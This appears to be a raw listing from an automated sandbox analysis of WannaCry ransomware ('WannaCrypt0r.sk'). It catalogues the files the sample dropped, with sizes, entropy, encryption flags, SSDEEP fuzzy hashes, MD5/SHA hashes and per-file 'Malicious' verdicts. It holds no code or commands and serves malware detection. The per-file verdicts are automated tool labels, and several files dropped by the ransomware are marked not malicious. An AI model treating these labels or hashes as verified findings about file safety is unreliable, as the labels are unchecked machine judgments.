                                                  SHA-512:00DD6878F5C38326EEE8E150A41D216EDD1681B9D41D198ACAEAA1A5EE3AB4030F0A433BA94DCC60C14A48D8C3ED89236A5F9CF29E0336CD08EBDCFA3D8A1236
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7960
                                                  Entropy (8bit):7.9759972955320215
                                                  Encrypted:false
                                                  SSDEEP:192:rBWa2T2olBu2aqCsXLsu7406ePI/zfpcBXgbGu1DH:rBuHu2aC7Ta/zxcdu1DH
                                                  MD5:B400928E141D7FB9EA2A581A645855E4
                                                  SHA1:D2FE057F84BE61443D4FE20C4A9FB9946DE4ECF2
                                                  SHA-256:C3B6A4FCDC4E17471FDA95D99C498AFA0EF6966664268DC4983494AFC4F3104D
                                                  SHA-512:4EC1000CA3E057DE4BC5E6D51FBC23293A000D9754F03FFB63400C834566E7BBFA2AB79896117EDDA137CB4CC9CED21A0B8C3E6C45A00FFC91B4C2128EAEE889
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7032
                                                  Entropy (8bit):7.976870913276875
                                                  Encrypted:false
                                                  SSDEEP:96:ovcJcmUmXQTva1YVS3ux5JtJEi1+3UvKE2qd9dz48CecsEH/lRSJnwIG17/axukz:i1Zv0YVOu1tJsVqd7Cek/lKqLMg24d2
                                                  MD5:5CCC85016361EA944F66147757ED532D
                                                  SHA1:0D547DAD5144BD9AE5342F648AEBBC52AEA220D2
                                                  SHA-256:8F31BD7B31FB11604D13025F407F289C169254BB76610A187E9A0490CB9E49DA
                                                  SHA-512:35BDDEC8DE3809A8B751A06E53A587FF84799E95F19113470E221FE6A0D25EA47C0DF075293DFE7C6BB41374C6817B3E66268567EDED93ED8C781A6413A0B2B4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8792
                                                  Entropy (8bit):7.98118153501082
                                                  Encrypted:false
                                                  SSDEEP:192:vEg/mNjRpO1LJn2HwMJWBxPUICdFb/73W+DFLkcysQ7k3RSyM:teNjDwn2HKxcIo/lDFAcy57k3vM
                                                  MD5:338A2B6228F4D71AFB0ED0D758304E8D
                                                  SHA1:CD8F464F8C0B44A2BF08551B1EA35D889507E439
                                                  SHA-256:FC9159632D56032D025604713AB8627596D276E4EA967D1FE8679E04064AF485
                                                  SHA-512:1A9462BC61AB3CF2D2DC2078EDDA1417FBAE79558CC5A20043E93DFE7E681E5C47081507D323118388BE736FC43D3647DC94F262E2E9170E105524230A19B96A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.993654638560137
                                                  Encrypted:true
                                                  SSDEEP:384:hscbsEmTk9Ne/74SY4k4++5YoDLXbW4xVdDpKb9zR7pVOmAzQurM/vMRfkJ/CPs:hscg+No6dALLPjds7wzQurM/kiqE
                                                  MD5:10EEC7B1F7A51A4AAC837A40412E236D
                                                  SHA1:1E21E1D8ECDC125FF1263A53AD284FE3F2AD6823
                                                  SHA-256:464E89EDE4B9E98F0762201F3C0C1F247A200DF2C6098F9645E042534C89FB8D
                                                  SHA-512:34D217C264FE619B269C32A7CC05A06C99C677A4CF0F16CB108C5141A4D01C9C4375CA8D0932A6CD0229C1BC6DD4C8F83F4F8AEFB429CF30EEEE9F86AB1EED32
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.99310446080802
                                                  Encrypted:true
                                                  SSDEEP:768:LNZTLyh/H8lzqkurhbJd83TyYwz92CS51Fzsma:fCEe2DyiCS6n
                                                  MD5:557FE311D8A3E91235341926CBC6FE14
                                                  SHA1:76BDFF37AFB378586751211C15D496686A90ADF0
                                                  SHA-256:C65BF83AC5500E76CC9EBF8B866F2B979B686BD4864637ADA97B5D8F9DFED9E1
                                                  SHA-512:0BFA140A9F6CB114DB974A3102B124153D32AE7481AD8C7ED476ECB4A80628EF9119DDD312DAB0B8931DC0404D82A8F7FEF970D72F8059E553A0E69CB750FCF6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.991603722591334
                                                  Encrypted:true
                                                  SSDEEP:384:r6fCfpAIoeBrZti501llPnFJXR8J3i8/kTx5CVIZhAYAP5sTO1N2jdmEVJE2:r7vxTFFJhh8s+VBYEOwq7JE2
                                                  MD5:AAECEA487F195A921EB5F04D76036A4F
                                                  SHA1:0D3DF0A50D891F94247690ED989B41F0ADB70989
                                                  SHA-256:EA8682E72F5A776506A753CF10B81F42DEF83852BE62DE599A4E528157DB9C2D
                                                  SHA-512:FAB722E4816FD5B25B8CB64E6BF00EA75BEAE77C88D83CB6CF981D624167904CCEA168EBA4AEB9C8896C471951D0EE21F4995E65EF768B6573452D0C8A5CC526
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4376
                                                  Entropy (8bit):7.957811386775664
                                                  Encrypted:false
                                                  SSDEEP:96:oL9dPaGwl8dF/UJj5+61TCPSvHAlZdJrqRCisyfFncu9t:edL/UJjR1nvHwdJ+8Wes
                                                  MD5:1EAE4380C9983EA9B568260D7B4442B4
                                                  SHA1:98043C621103F9FDCE6C8E7E99BA888664B19310
                                                  SHA-256:2DD65C03403671D1439F2C31F441A81AA779E8B518DBAB0D7E7216A31FEB7208
                                                  SHA-512:2406CA4B2332771FD303A956D8F940F21EF3D7B418B712AB038CEC822792815A1E36EA28C8B3E9418D61B71E54255EEBA97C42E991DD3D0B91FC53AC451B373A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.991609432094003
                                                  Encrypted:true
                                                  SSDEEP:384:xOGxkvizEgEnVlgzerU0RaaBQegumil7HPHA3KFRbIzFgyO06hiSw5VI/DJnTchY:x7bAgHerUKeUH7Hf8gRbYWt2u/DJnTc2
                                                  MD5:B706078ABE47D56A9AE8AE3721E9205D
                                                  SHA1:3AA43A5599A290079116B50A74DDE8999FE1CB46
                                                  SHA-256:FD063900EDF6964C0B9091581B54D42DAF4525C22975C4F56B933386C56060B8
                                                  SHA-512:BA32EDBFA3BBD29AE0484236369F097D299B7452DD4966FF4BD12EB5085197A265625D2CA138368A37C48EC35F4783FCD87FBD1270E01859055B50D20B15D002
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7160
                                                  Entropy (8bit):7.9750510138443325
                                                  Encrypted:false
                                                  SSDEEP:192:ZM/oCBCsX3KD7JM5csiIgXiMSTobyrxL0kuJncY1:UxBCseJM/UbyrxLJA1
                                                  MD5:599D6924FAFF32C236BC2AD5CB01852C
                                                  SHA1:FE8E27F94CB70174CA78CF0FC0F062511957D2F8
                                                  SHA-256:2654DCFE5ABD856B54173604A85A8DC78A069B33CEDC2D04F2971D8E7E68BEE3
                                                  SHA-512:7BD2CCE1A8E97CA97936608616CD1A258D33FB7F187B9AA55DA244C317BC760A069C1512BFA79CB28FDAEB9E48832390DEBBD1059F0CB7EB2162D92FFC132558
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.989160268014634
                                                  Encrypted:false
                                                  SSDEEP:384:YlRLbDYErSyWsRy51XduSVl1igJEJSmKetHYdg4yQZ0J:aDrSyRRy51oSP1igQKqYdfC
                                                  MD5:43FBF3FF5CC2932B49CA7D3957C674B8
                                                  SHA1:60E13CD8B38BE3851B84D67F1EA9DD5A2F48AE9F
                                                  SHA-256:951AE5163ABCCEE09FEFD778C4DBF411E5A7193E89B9B6798EE24512E9DA5CB8
                                                  SHA-512:F891E39951170B75802697D2C8AFE268CFD803E4E2A680BCA71F48B55A200AB4D6F0AD1892E21E10EEAD6973B988445705370350A0245028BEF034DC8396A12C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.987609891238008
                                                  Encrypted:false
                                                  SSDEEP:384:cqFQR58z2DNS5QP8kaAkai8zX/uQ7UnZpOXeVQIiL:cqMm2DqdaXzX2Q7Un2OKl
                                                  MD5:7FE3758AA2BD622A5CC9E0FF23A29463
                                                  SHA1:2C1FE85FA5C3BB72720F918BB1873D5E183939D1
                                                  SHA-256:974645BE36AA8A80DCFBF2BA750587DD50609969BD3C861E2CCA298ACE089852
                                                  SHA-512:F78EAC81A0EB6765487F6FC71A5B36197FFEAF770267EDAFDDFD10B9987B5815712712494BBCF9D700660E68C18BCD9C5A98BC8C46886A760D0F14D9B701090F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):424152
                                                  Entropy (8bit):7.999569867414532
                                                  Encrypted:true
                                                  SSDEEP:6144:9gU3Xs9yQcG8ZcBGm4AtEyBYGTPjlRbJh3MO7aFdUV/QqmxJjKrHKXipKz6Zh:9gUH0wVUvf7bJhhJVQqIOHXKz6Zh
                                                  MD5:405C3CF7102046D0450C82D8BF96D864
                                                  SHA1:FABDEEB8B80BB1FAEBC9340B3B1C95491D3949D0
                                                  SHA-256:ABD6629F75D033567DB9B6DB6674A42B3C8060E68E5F58C4ED51321329899134
                                                  SHA-512:64882214C02D6B68F175374BA305A3ECF12F1CE5217D2CDA4B9F2C207D8A67A27A684421CB7B1DBE203EFAC0DBE9D7073324EC75E920C4933B18E6B6FDFD3346
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):100984
                                                  Entropy (8bit):7.998244260718336
                                                  Encrypted:true
                                                  SSDEEP:1536:BjY8mBhiZ5EfBdgTIvx7S7oD3Tf/d9vvZOy8DqvGD3959BuK9lPC9UUM7Sf6oHQI:68mB0EUkJSAbd9nZX8mvcliUUffcQ
                                                  MD5:B369554685D07C227F7DB860792A83E1
                                                  SHA1:C0ACE2E59B09C0D533B274ABB5FC77E7A6CEE9F2
                                                  SHA-256:D57CB8CF831EF1AD8F3050259DA39DE16FE9396CABC4FC329B4E2243B2ABAA5A
                                                  SHA-512:C33F3C10638A1D436086895B042A74B80F6EA7047CAE11C33263B6D56C6588FFC6C4AC374674889D0437A4FABCB7A1A631BEC8D189F0A00C19D964D248374E6F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):75576
                                                  Entropy (8bit):7.997299618721468
                                                  Encrypted:true
                                                  SSDEEP:1536:gKpjZH82hCoAtPz44EDw9KzhrcyVgh06KrQwFgqbqaytWnkxIt1MpsXAvCn:g4pmBwFoyehsrhytcAsXAg
                                                  MD5:B642A18EADE98D5CBC7799620C63113B
                                                  SHA1:ED86E0CD23A74585E7C92B805198CE0E3511FB40
                                                  SHA-256:277DCA165D0789CCC986B96F356748BDA13255B13873D68BBB4928FA3F99D80A
                                                  SHA-512:A9469E29F1525539C2C4F6104492D9A9D7DD4589B474953504365735FD08B11F54647E74CEF47951C31C6A56DF8002AB53A3EA3EF2FBB036B1DEBDAD85331147
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):75352
                                                  Entropy (8bit):7.997489532766033
                                                  Encrypted:true
                                                  SSDEEP:1536:QVLSQ87ZAwE0MZacVLrCHCf9gtrJLzaKjtTo9ghqzY9gjNKPbcAdlRs9Zml:aubZzMZaBHCf9gpJLzFHq892NKjcOlOO
                                                  MD5:2EA4B5CBC70613254BFAE56DEAAA9AA9
                                                  SHA1:7DD58326F40CB9AB87B2189DA77CDB04C4212B2E
                                                  SHA-256:830B43357452022817DAA455E4D7B514550A1C194F7F531833F1C8DC41798411
                                                  SHA-512:15E22C7CE246F270C02361E0C196072300D0AFE10A499FE56D08BCC547981AB2AC9A67BAD26F32A9742AE540D6FC38E6F1C7CC5B0468CEAC2B437FD54AD117BD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.173477892175478
                                                  Encrypted:false
                                                  SSDEEP:6:bkEEU9jzhOO9MQCkFCPWZR7TRGChoiXU0MP4wgUoTPpMHDFD:bkEE+IOqQ/CKR7oCCXP4VxiHZD
                                                  MD5:5D819168839828BAE651304A77A4726B
                                                  SHA1:7201EFB68E7F67BD016A258EE94D4F4362D7D6F3
                                                  SHA-256:FFEA2FBB8544CC56C12A58C9F842757388D263B2D8614D63696A5ABBB81E4E9B
                                                  SHA-512:51F7D4AB9CC8B93CD51F7CEF6974B73AB9E14BD738061B6119B1E2E65510655733E30168E01132965380C373E6765F02F07732CCA5665CE1639FFA438E86BCCE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999812396639101
                                                  Encrypted:true
                                                  SSDEEP:24576:OyV45c291oQVxkt+LeIeNmGW0aWb/jEC4KT/8O5AOW:ZVm9z+8w7WKIr2b54
                                                  MD5:07A527ACEA90EDE58C853E177D9AEE99
                                                  SHA1:BAD34CA9192FF2DF3639F1114711BAC7BA3890F9
                                                  SHA-256:E30F5DBD30DCF7E16251E7FF0A1EC75AEC010E4B7067480C6C22AE4DE5DF02B9
                                                  SHA-512:CCF345C7157D643EDCD179D14780F1973D053970F4CA31800922B1EC03C05D5D157FF94B8A6302FF1439354C64D5C895C8333DCA4D4EA273BFE69AE66599C6FE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.190633006183709
                                                  Encrypted:false
                                                  SSDEEP:6:bkElx5kDi6bR/rRMkv0ELxiJVQsGF2rciwzSNSjf2WaMbY1L7P:bkELeDhbtrRMcvibK0ci4SNSjfDaV7P
                                                  MD5:89EBD0EE811F105D7ADE5BE028B265E7
                                                  SHA1:2724E8994CCEB73F57B00A6549C9EC1996C398C4
                                                  SHA-256:2BF206A0AFB895D8F79112FB34FCF6A7FF986C6925F2E439D2418A9EB0C957E6
                                                  SHA-512:0E32D48F0032E0463923B9666200A8E90B5BF03E565E5CBE633EA218A7BC9CCB737E746B50CA02F6B19E8A172E1CD2D8D76780E9434B1F1D55BA96C266E2F3F0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5243160
                                                  Entropy (8bit):7.999962358427426
                                                  Encrypted:true
                                                  SSDEEP:98304:CRKLCBCWjGJCMGlECQ1nYZb4oJ3VWKt/9y5LrJ/wuT9wEzGjLBwtwn:CgCByGlhQ1Zoic9aLdwo9H6Iwn
                                                  MD5:B768ADE98E7800EDB0FC71BF0E37E33F
                                                  SHA1:D66EC28A2A3606E72E6F57749505C60069924F4A
                                                  SHA-256:131FCE3BE1ED551D84429B0BEFA32DE2BBC15912A073383E8A05A63655193261
                                                  SHA-512:4FB9021E038CCC8FB5502EE37BE113EDD67979E782AF1264D9361D203DFE0E2D11623B80244880D1F3E5B9E420A15D92469533EDAFF07A6780E6318EDBC94D7E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.207194786323538
                                                  Encrypted:false
                                                  SSDEEP:6:bkEXcI+v00kJeGZ9Ia8ZfG/yPStKRgBxyKqAuN47QozW/0:bkEXcI+c79ZZ0G8UnWLu72/0
                                                  MD5:6F4C68C1D1CDCEC27C6D2A8AAFE6D238
                                                  SHA1:818B2ED209954A56318AE6A50666E729BA6295CF
                                                  SHA-256:F0929773060A0FF1F0CB0D3BD18B3770F9277E6A6598F5077CB736DB468C0CCD
                                                  SHA-512:37726C5EE7690E62A8C2F5F87D20BF493703CD46E39AEDE7ECB33356F7E0DBF092D2A289921DB1B0040A6DABC1595435EF4D0FAE34B5883CE6BF2C7D36D91782
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2097432
                                                  Entropy (8bit):7.999919930034065
                                                  Encrypted:true
                                                  SSDEEP:49152:/2Njrixcvq15iyQbVVGHHhzz+udwCAjw//X/goDWtv9q80:CrixcvyzQbKHhzz+uBAj0/bQ9qL
                                                  MD5:BAED012CE1A793116390F2E95B400BA0
                                                  SHA1:8BDDF9541F45CF3593C2D459AB00F467C06CF9CC
                                                  SHA-256:44ED77CC2E2ABB431FF21034AF2AE34D2D858212DD46F8CB30A559DFC945A3BE
                                                  SHA-512:2E5668C28B88A67E70094F09048AD10D6AB12566F127A37305575579CE82A1FBD098A0BEB230CDAF11AC0000D35218651386CB34BC5F3BA1DECF8838797C853B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3146008
                                                  Entropy (8bit):7.999944011274961
                                                  Encrypted:true
                                                  SSDEEP:49152:qh2N4Hzb40FMK8rk81vK0y1bw//yTq6z4SCli6cKkritwGoG/SpU5Fv:KTcXb1Y18STxESCNTCuUmFv
                                                  MD5:327C4B33255D4545BB5C1DFE829D6BEE
                                                  SHA1:13DF471F90D10BA246D000455E7302E0689570E1
                                                  SHA-256:A745A01297B50E2B04141D6A55FD5ABAD72EB002DC46DCE9CC40640E5D8DEFD7
                                                  SHA-512:AAEDEDC81D4E2D45AB945D438B44C35BEC63A7817F7208B6D153ADBABB2F7A65803D4B521E0E19CD2989316A43C6FF660F430D58435277262C8EB71568AA28D4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.19823969812011
                                                  Encrypted:false
                                                  SSDEEP:6:bkEBbEY/XE5AW2DC6sRi08gTwIMrtKrV4h9if/MojNm+u4pO:bkERE5z2+68i08gznV4hAHMoIgO
                                                  MD5:7CFA5D8B0153B5BFD669DA2A8A3F0CD2
                                                  SHA1:30C327A80C19F17C1A3E7EFA0F0BF5A973D0F8AC
                                                  SHA-256:CA7390B7D87C2B3C9CCE48CF45E50585888217ABD5DA725ACEA7A769F4299C82
                                                  SHA-512:99C2CF399A13E6BF1E2E908D6A5C381DE8A0B4C506FF9D4B78C363695066CC0006D86CD998137AF0FB9A5A6D2B790C45AA8141359160E22E83E90B78ACE4DBE7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.241600375677764
                                                  Encrypted:false
                                                  SSDEEP:6:bkEcLb5zG7/I3cb8+FpBiSPiP/6hy3w3Sm2gi03Gj2AviAjjQeNvUzoak5qC:bkEcHFGM388+Fv1i68nBgwixeicakMC
                                                  MD5:CDAF1C53CFD7B26A928E0A581E527C44
                                                  SHA1:350468FD1862CF7F8555CEA3E9C5708B462BCBFA
                                                  SHA-256:51FBAB69D8C1356C06DCFA74E4EC90ABB3C6FAC3897FE497DDB3763D28FB4AA7
                                                  SHA-512:C12ED89BF52BEEA3C1F1EE796A5DDFE24C9FBDF91A9055C28602E8A5AF2546F2C0899820AD1A303A2800CF57EAD1896D57EDF2963E011752F954325B0D1F82B5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.232338558767144
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.181349041593196
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):58600
                                                  Entropy (8bit):7.997282020997851
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.241251119828446
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.308437132793201
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.300775724057425
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.137375748292466
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.99981494717792
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.180468195209316
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999828019306985
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.265498083071431
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999823465789391
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.99979235793336
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.242099397092838
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4194584
                                                  Entropy (8bit):7.999955357989935
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.213510664597503
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.165993655002149
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29512
                                                  Entropy (8bit):7.993634030579915
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.265640993143951
                                                  Encrypted:false
                                                  SSDEEP:6:bkEd1GseJCts3iF8FMtC8zNVtNmcFxCUSOQPFv36bX9hHwG2bhmH6Qzn:bkEv7WkeiFUol5VCc2Ud6SbXHHwG2bwJ
                                                  MD5:DA71D05A1801EDA5320AC6EB0B0EAD58
                                                  SHA1:9B8E97D4271AEB4D35D4A623B9387039C4F3C715
                                                  SHA-256:174AD64FE533C93902CF17471CC322858E9B01A120027E74D41F52B0482B1258
                                                  SHA-512:051AFD2C366B64E6166AD48AF462D95964ACB50C539242403E17BC910BADE340F69DB00AC86DA201F31424DCC2B9295E0CA91FDE29D60C8773003C0CCD031D40
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.2032868345643255
                                                  Encrypted:false
                                                  SSDEEP:6:bkEegoGlYvGrZjQ1Aq5wrqLW0LDRN++8OcgcnlEpt/vx+wr1Yyh4:bkERlnQNKrqLnLDnptx+5
                                                  MD5:735209420E16B681AFE326D6AC853541
                                                  SHA1:89AE08302A669C42003F05F913D213285367D05F
                                                  SHA-256:724F7A5E08054DE486FFA9D205638E409459971492E74E8370522648665DECDF
                                                  SHA-512:3C9BEBB1A4B16F02E89DF32CE8E75DB4326958398A35ACC67BF608382CEB12138DDB4924B363B70A2BB7F9375422F2D2F6196D59BFAE7139E0FA7B17D6B1C7A9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.227356626244864
                                                  Encrypted:false
                                                  SSDEEP:6:bkE4Mamx5NsrsHG0RFSeSMqLv+a1/NUFNWJCWjuclqtJJD9c:bkEqmxorl0T7GvTGWC9clqB9c
                                                  MD5:E51A9F984721B6E030DABC4D433B2549
                                                  SHA1:D8B63E21CC619820C1850DC06A154D5E73AFAC3F
                                                  SHA-256:FB7DEEA73E067E7EFD4993D338AA429B70C59C39DA48461C28CDFB2B45DDE956
                                                  SHA-512:FDA8766DD152AA3E5D0FF1CAC8B8E18D952093248438A9621CD44445A11683FDA1FB3C00B4F32F1FAFC4548436C6649B4EA7AC164B68A3E2D041ED8576989931
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999789359748619
                                                  Encrypted:true
                                                  SSDEEP:24576:MXcvSEyg/Q8NgFoehgFH76Tho9DdjOYvspkT:UCSINUbhgF2hdYv7T
                                                  MD5:8B93664F85CC226F0B34C233398E098F
                                                  SHA1:30EE6E94EA4AD26F73EDD9BCFB5D4865810F3B49
                                                  SHA-256:BD8D2932340DB7A9713831028517EF74AFC812C32689BD169BABF047392F2991
                                                  SHA-512:CB73EEF34510BC80B69E40A506C59B0B7563E6B263528870754F1812DDEC319C8C5538A43DF8EB24DC31565C805B0A57982740D92D95B0001B0926EA32DB488A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6360
                                                  Entropy (8bit):7.965787542240746
                                                  Encrypted:false
                                                  SSDEEP:96:oPfsuZdPAZgsnPDAqeKC2Mw1OLQsfEvLQu9Yj4yaLm4wczKp7ZobuxM1s9tFlG:/uvPAPUK9OMxHYjxUm4Rg1ob6MW/G
                                                  MD5:F3D17DD92BE76CD75F0FD98216E20ED4
                                                  SHA1:1DC0D331E221C1A3FCBB1C3692E17D41F120617A
                                                  SHA-256:5E12B25CC86E390E646BA805A869B2F55771F5388970E6DC1464079DCCFC3E05
